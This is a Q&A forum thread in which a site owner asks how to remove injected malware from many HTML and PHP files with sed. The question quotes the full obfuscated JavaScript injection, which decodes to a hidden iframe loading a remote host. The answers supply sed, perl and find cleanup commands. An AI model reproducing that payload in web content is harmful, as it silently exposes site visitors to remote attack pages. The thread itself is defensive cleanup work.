# sed help remove malwarm code from multi files

Tags: linux, sed, grep

ive this malwarm code in so many files html and php on the server i need to remove them using sed -i expression  search all files on dir /home/ find infected files and remove the code replace it withe white space any help ?

```
 <script language=JavaScript>var usikwseoomg = 'PaBUTyjaZYg3cPaBUTyjaZYg69PaBUTyjaZYg66';var nimbchnzujc = 'PaBUTyjaZYg72';var szwtgmqzekr = 'PaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg20PaBUTyjaZYg6ePaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3dPaBUTyjaZYg22';var yvofadunjkv = 'PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76';var ylydzxyjaci = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg77PaBUTyjaZYg69PaBUTyjaZYg64PaBUTyjaZYg74PaBUTyjaZYg68PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg31PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg68PaBUTyjaZYg65PaBUTyjaZYg69PaBUTyjaZYg67PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22';var xwojmnoxfbs = 'PaBUTyjaZYg20PaBUTyjaZYg73PaBUTyjaZYg72PaBUTyjaZYg63PaBUTyjaZYg3dPaBUTyjaZYg22';var mgsybgilcfx = 'PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg74PaBUTyjaZYg70PaBUTyjaZYg3aPaBUTyjaZYg2fPaBUTyjaZYg2f';var nixyhgyjouf = 'koska.sytes.net/phl/logs/index.php';var nesrtqwuirb = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg6dPaBUTyjaZYg61PaBUTyjaZYg72PaBUTyjaZYg67PaBUTyjaZYg69PaBUTyjaZYg6ePaBUTyjaZYg77PaBUTyjaZYg69PaBUTyjaZYg64PaBUTyjaZYg74PaBUTyjaZYg68PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg31PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg6dPaBUTyjaZYg61PaBUTyjaZYg72PaBUTyjaZYg67PaBUTyjaZYg69PaBUTyjaZYg6ePaBUTyjaZYg68PaBUTyjaZYg65PaBUTyjaZYg69PaBUTyjaZYg67PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg74PaBUTyjaZYg69PaBUTyjaZYg74PaBUTyjaZYg6cPaBUTyjaZYg65PaBUTyjaZYg3dPaBUTyjaZYg22';var rqchyojemkn = 'PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76';var niupgeebkhf = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg73PaBUTyjaZYg63PaBUTyjaZYg72PaBUTyjaZYg6fPaBUTyjaZYg6cPaBUTyjaZYg6cPaBUTyjaZYg69PaBUTyjaZYg6ePaBUTyjaZYg67PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg6ePaBUTyjaZYg6fPaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg62PaBUTyjaZYg6fPaBUTyjaZYg72PaBUTyjaZYg64PaBUTyjaZYg65PaBUTyjaZYg72PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg66PaBUTyjaZYg72PaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg62PaBUTyjaZYg6fPaBUTyjaZYg72PaBUTyjaZYg64PaBUTyjaZYg65PaBUTyjaZYg72PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22PaBUTyjaZYg3e';var yyzsvtbnudd = 'PaBUTyjaZYg3cPaBUTyjaZYg2fPaBUTyjaZYg69PaBUTyjaZYg66';var tlclvgxfthn = 'PaBUTyjaZYg72PaBUTyjaZYg61';var zxttbudjafh = 'PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3e';var yydszqnduko = new Array();yydszqnduko[0]=new Array(usikwseoomg+nimbchnzujc+szwtgmqzekr+yvofadunjkv+ylydzxyjaci+xwojmnoxfbs+mgsybgilcfx+nixyhgyjouf+nesrtqwuirb+rqchyojemkn+niupgeebkhf+yyzsvtbnudd+tlclvgxfthn+zxttbudjafh);document['PaBUTyjaZYgwPaBUTyjaZYgrPaBUTyjaZYgiPaBUTyjaZYgtPaBUTyjaZYgePaBUTyjaZYg'.replace(/PaBUTyjaZYg/g,'')](window['PaBUTyjaZYguPaBUTyjaZYgnPaBUTyjaZYgePaBUTyjaZYgsPaBUTyjaZYgcPaBUTyjaZYgaPaBUTyjaZYgpPaBUTyjaZYgePaBUTyjaZYg'.replace(/PaBUTyjaZYg/g,'')](yydszqnduko.toString().replace(/PaBUTyjaZYg/g,'%')));</script>
```

Answer (score 1, accepted):

You can use `find(1)` to find all your infected files:

`find /home -type f -name '*.html' -o -name '*.php' -print0 | xargs -0 [command from Sjoerd]`

Comment: find /home -type f -name '*.html' -o -name '*.php' -print0 | xargs -0 perl -pe 's~<script.*?PaBUTyjaZY.*?</script~~g'


This load to me all html and php code  as verbose and how to disable verbose

Comment: @user172697, you need to use perl's `-i` command line option to perform in-place editing, just as for sed. And just like sed, perl's -i also supports a `suffix` to make a backup first.

Answer (score 1):

```
sed 's~<script.*PaBUTyjaZY.*</script~~g'
```

This assumes that it is al on one line, and that there are no other `<script>` elements on that line. Otherwise, you need non-greedy, which means perl instead of sed:

```
perl -pe 's~<script.*?PaBUTyjaZY.*?</script~~g'
```

Comment: how use it as command to search on *.php and *.html files on /home/
thanks in advance
PS i guess perl -pe my command

Comment: See http://www.liamdelahunty.com/tips/linux_search_and_replace_multiple_files.php . Make backups first.